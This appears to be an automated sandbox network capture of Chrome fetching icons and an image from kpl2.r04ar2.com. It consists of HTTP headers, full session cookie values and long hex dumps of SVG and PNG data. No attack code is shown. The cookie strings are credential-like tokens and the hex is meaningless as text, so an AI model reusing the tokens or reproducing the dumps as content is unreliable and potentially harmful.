                                                          2024-08-27 22:11:13 UTC1369INData Raw: 4e 56 96 b0 33 37 47 5e 33 73 e4 ce 65 02 8e 03 d2 38 0e 09 c9 c9 88 4f 4e 46 cc e7 cf bc f5 65 8c 82 18 d1 1b a3 d7 f9 b5 59 a3 81 95 5f 55 f4 23 ed c0 c1 43 dc c8 5f 46 d0 ce bd 7d 7c b0 71 c3 06 ad 60 22 7b eb be a8 47 09 3c 7d f4 10 ae 6e 45 d1 ac 5d e7 4c 89 71 48 32 1a 72 9b fe cb 97 cf 08 6c da 0a b5 ea 35 94 03 87 1c 1c 43 d2 e3 92 ef 34 c9 9a 77 eb fa 15 7a 9b 9e 6c ef cb 28 24 5d 2d 21 78 b2 a0 4e 95 72 e4 f4 53 fc 32 55 92 21 cf b7 9c 23 56 cf 6f a4 4a 73 a4 58 d5 86 45 be ea 1a 61 cf 88 5e 25 c8 d5 aa ec 69 67 0b ef 82 05 e1 95 2f 1f 4a d8 d9 c1 c3 ce 16 2e 56 56 c8 65 92 b5 eb 52 39 0e af 92 92 f0 28 21 01 0f e3 13 70 f7 fd 7b 84 c7 c6 e1 71 fa 09 8e 6a 29 61 64 8d 18 d1 1b 99 c3 b5 60 ae 46 03 ab 16 f4 d1 b9 c8 a1 c3 86 71 c7 8e 1e a5 fd 8e
                                                          Data Ascii: NV37G^3se8ONFeY_U#C_F}|q`"{G<}nE]LqH2rl5C4wzl($]-!xNrS2U!#VoJsXEa^%ig/J.VVeR9(!p{qj)ad`Fq
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 78 f7 fd 07 fc 7b ef 1e b6 3d fe fe b8 49 3d 0b 0d bb 15 23 7a c3 f6 9f 10 b4 d7 78 70 15 82 11 aa ea 10 fd e6 2d 17 18 50 0f 64 d6 4b ca 96 ad db 50 b6 8c 97 56 b1 b8 7e 23 9c eb 12 d2 99 f6 67 69 69 85 d1 53 e7 ca a9 1d 11 7e 8d 3e 8b 27 04 5e a3 4e 7d 04 34 6a 2e 97 03 9f 24 cc d9 b7 7d a3 e4 56 7f 31 4f 34 6b d7 29 53 0a 5d 52 87 6c bb 23 8b fa 64 4b 5e 1b 73 7c 4c 4c a6 1f 91 5b f5 3b ff 69 a9 2a 64 99 ea 93 85 77 13 e6 9e c3 f9 ab 92 0c 7a 65 4b 16 c4 da 3f 9b c0 2c 77 2e 95 64 a7 99 97 82 b9 7d 4b 5e b0 67 44 af 12 f4 74 cf fb 80 32 65 30 a0 6c 19 8d 57 d2 ab d6 b3 f2 b5 c9 b3 fb bf 23 ee 60 c5 dd 7b ca 37 12 59 4d 46 f4 22 73 a8 1e cc e1 65 80 d5 83 de 1a 75 f9 df a6 cd dc b4 a9 53 a8 8c 7a f5 02 f0 d7 5f 8b 74 82 43 fd c0 40 2e fa f5 6b da 6f df
                                                          Data Ascii: x{=I=#zxp-PdKPV~#giiS~>'^N}4j.$}V1O4k)S]Rl#dK^s|LL[;i*dwzeK?,w.d}K^gDt2e0lW#`{7YMF"seuSz_tC@.ko
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 0c 26 b9 72 a1 6e 83 a6 a8 5e 3b 00 b9 72 c9 6f 4f 23 5b e5 c8 6a fa d8 b7 92 63 74 49 29 ea 56 08 bd 82 4b a0 55 90 a7 90 e1 ce 52 37 6d dc b2 cf e8 88 11 7d f6 e1 40 08 9e 10 3d df 25 39 25 05 4f a3 62 f0 fa 4d 1c 3e 26 7d 42 4a 4a 2a f2 da 58 c1 3e bf 2d 8a 16 76 42 3e 5b 1b be bb a4 f2 12 53 52 30 fa e2 65 ec 7f fe 5c 2b f2 85 24 94 11 bd 90 bc 61 98 ba e8 9c e8 f4 05 d3 83 c8 48 ae 75 4b c9 fe f1 bc 79 6d b1 6d c7 0e b8 ba 38 eb c5 fe b9 7f fc c1 ad 5a b9 92 ea 62 63 6b 87 fe 3f 8f a1 09 72 64 0b 49 76 43 9e c3 df 8f b8 29 f7 39 59 57 d0 ad 5b 77 38 98 1e 43 ae 54 c3 7a 4e c9 99 58 22 d9 ae 0b ac ac f2 6b 05 77 46 f4 59 5f 5d 2e d6 56 f8 d3 af 26 aa 38 f0 7b e7 e7 65 f4 5b 5c bb fd 00 29 a9 69 d9 5e d6 c5 5c 9d e0 5b b6 24 34 38 4a 21 5b d9 c7 a3 5e
                                                          Data Ascii: &rn^;roO#[jctI)VKUR7m}@=%9%ObM>&}BJJ*X>-vB>[SR0e\+$aHuKymm8Zbck?rdIvC)9YW[w8CTzNX"kwFY_].V&8{e[\)i^\[$48J![^
                                                          2024-08-27 22:11:13 UTC1369INData Raw: dd f4 ec d5 1b bf 8c 18 2e 6a 7b b3 c3 33 e9 f3 67 ce 34 f9 1e 4c 93 1f 22 57 ca 53 5e 60 27 47 cc a6 99 97 40 9a 79 69 58 5b d9 09 02 57 46 f4 df 5d 5b b5 50 21 6c 69 50 9f 17 5f ff 28 e4 c0 c9 4b f8 f4 e5 fb 09 88 ca 76 e2 5f a5 3c 1c 0b 66 7f b6 82 b2 72 b2 aa 47 96 0c 04 ed 3f 80 07 1f c4 97 ff 9e 11 bd 26 91 c1 da 12 04 04 31 40 6b c3 15 09 89 49 5c ed 5a 7e 48 49 91 64 cd 5a b7 7e 03 7c 2b fa 88 d6 5e 65 31 fc f4 29 9e cb 95 f2 82 66 d5 33 49 7b 83 5c a9 af 15 37 35 31 05 97 2b 3f be e5 76 c2 b7 dc ce f8 96 bb 08 ac ac ed 05 87 25 23 fa ef ae 0c f6 28 8e d9 d5 ab 29 f6 ad 1a 35 ce 85 45 e0 f5 1b d5 b7 73 b6 ac 5f 13 66 66 b9 d5 e8 51 b9 26 7d 4f 9d 41 e8 cb 97 ca 55 36 a0 5a 8c e8 0d c8 59 02 55 55 70 83 35 5f 38 6d dd be 9d 9b 34 61 02 15 e7 e7 57
                                                          Data Ascii: .j{3g4L"WS^`'G@yiX[WF][P!liP_(Kv_<frG?&1@kI\Z~HIdZ~|+^e1)f3I{\751+?v%#()5Es_ffQ&}OAU6ZYUUp5_8m4aW
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 15 6e c5 24 7b 74 93 93 bf e2 f1 83 7b 08 bb 7c 1e 0f ee dc 92 d6 f3 f6 f1 c1 46 b6 c5 4e 1c d1 aa c0 0a 46 f4 f2 00 cd aa 5e 15 1d 3c 54 df c3 be f7 f8 05 de 9e c7 ab 12 78 7e be 65 e1 5c a8 a0 2a 4d a4 75 ff bd 77 1f 53 af 85 a9 d5 56 e8 8d 18 d1 0b dd 43 c2 d7 cf 20 88 be 73 e7 10 2e 3c 5c 92 c3 da 2e 5f 7e b4 e9 dc 03 ee c5 b3 5f 51 7c ed e2 59 ec dd b6 51 8a 7e a7 ce 21 f8 75 fc 38 83 b0 55 f8 21 23 5c 0d 19 d1 cb fb 46 9d 13 ec 94 d9 1b af ad 08 28 e3 e9 0e f2 52 a7 90 8c 78 24 33 9e 18 0b 23 7a 31 7a 55 b7 36 09 9e fc 36 6d d9 c2 4d 9d 3c 99 a2 62 6a 6a 8a 3e 43 46 c2 d9 d5 4d 21 4a 61 97 ce 61 cf d6 0d d2 7a 5b b6 6e 43 d9 32 5e 82 b7 57 a1 61 ac 42 b6 08 30 a2 97 87 c6 3d af 0d 36 05 d6 87 b3 95 f2 e9 67 95 c9 76 a7 ad 10 54 37 b9 4e 64 7c 02 3a
                                                          Data Ascii: n${t{|FNF^<Tx~e\*MuwSVC s.<\._~_Q|YQ~!u8U!#\F(Rx$3#z1zU66mM<bjj>CFM!Jaaz[nC2^WaB0=6gvT7Nd|:


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          76192.168.2.449873188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:12 UTC1108OUTGET /mnYZrvj92fDlYVB6kIIxHwk2kldgIYDnxxWUlq6qF78141 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:14 UTC649INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:14 GMT
                                                          Content-Type: image/svg+xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Content-Disposition: inline; filename="mnYZrvj92fDlYVB6kIIxHwk2kldgIYDnxxWUlq6qF78141"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BTOVKeIkdo%2BXlnb6NPExhs10Ch9Sljpok7sxTM4m5%2F06cozHKq3crjlFSGqFlNvLuiY1fJS8LyFX78g9CvqyfPjGcOmU6FLlGmmzIW%2F2jBPdqmloDbqEQZVGQADcyA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f656488f443df-EWR
                                                          2024-08-27 22:11:14 UTC277INData Raw: 31 30 65 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69
                                                          Data Ascii: 10e<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fi
                                                          2024-08-27 22:11:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          77192.168.2.449874188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:12 UTC1129OUTGET /opiCvib1OfbhHAtLAPQFkZJXG9XLLMrDTuv80Ycdhp7wkulvQ9LZaUjk5Jb8fief193 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:13 UTC674INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:13 GMT
                                                          Content-Type: image/svg+xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Content-Disposition: inline; filename="opiCvib1OfbhHAtLAPQFkZJXG9XLLMrDTuv80Ycdhp7wkulvQ9LZaUjk5Jb8fief193"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bi6lpKR76liwfrsqZ1hpA%2FwTR3m831cmP7LsZRrNeekW%2BJ1xYfI9aiBg%2BvrP%2F8VXNAM50wKFUon1VG9DbLQPhXOVuXAmZTqdBqMnhP5JNC0eRe6sbvI%2Fa76xGyF91g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f6565b9934393-EWR
                                                          2024-08-27 22:11:13 UTC275INData Raw: 31 30 63 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2c 33 32 48 33 38 56 31 38 2e 31 32 35 4c 32 34 2c 32 35 2e 31 30 39 2c 31 30 2c 31 38 2e 31 32 35 56 33 32 6d 2e 32 33 34 2d 31 36 4c 32 34 2c 32 32 2e 38 39 31 2c 33 37 2e 37 36 36 2c 31 36 48 31 30 2e 32 33 34 4d 34 30 2c 33 34 48 38 56 31 34 48 34 30 5a 22 20 66 69 6c 6c
                                                          Data Ascii: 10c<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill
                                                          2024-08-27 22:11:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          78192.168.2.449875188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:12 UTC1520OUTGET /staE25xquFIms1ubbV5xl8DLBnj3Wsk45GqF2Do244R3qvQUFMkQXp58H3Gfgh260 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:13 UTC657INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:13 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 70712
                                                          Connection: close
                                                          Content-Disposition: inline; filename="staE25xquFIms1ubbV5xl8DLBnj3Wsk45GqF2Do244R3qvQUFMkQXp58H3Gfgh260"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TQBbq8rpRvFyswFlhBnaosTJFpuVWRtUaZrNcIVtXKz26TyFwDlsx%2BPlJUvWkAz4ddosPnpRIn2tbu93tED40cbdNvrrsE9j7fZiYF740bFdXll7o81ngPoS%2Bh5VCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f6565fb2443f1-EWR
                                                          2024-08-27 22:11:13 UTC712INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 8e 00 00 03 83 08 06 00 00 00 11 c6 07 ce 00 00 20 00 49 44 41 54 78 01 ec dd cf 71 e3 c6 b6 07 e0 09 c1 21 38 04 6f 6e 95 97 13 c2 ac df 7b 0b 87 a0 12 34 7b ef ef 7b 55 0a 41 21 78 e7 ed 84 a0 10 74 33 50 06 7e d5 53 38 36 0d 13 10 4e 13 7f 1a e0 37 55 53 4d 89 0d 10 f8 70 9a 22 1b 3f 82 9f 3e f9 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                          Data Ascii: PNGIHDR IDATxq!8on{4{{UA!xt3P~S86N7USMp"?>G @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                          2024-08-27 22:11:13 UTC121INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08
                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10
                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20
                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
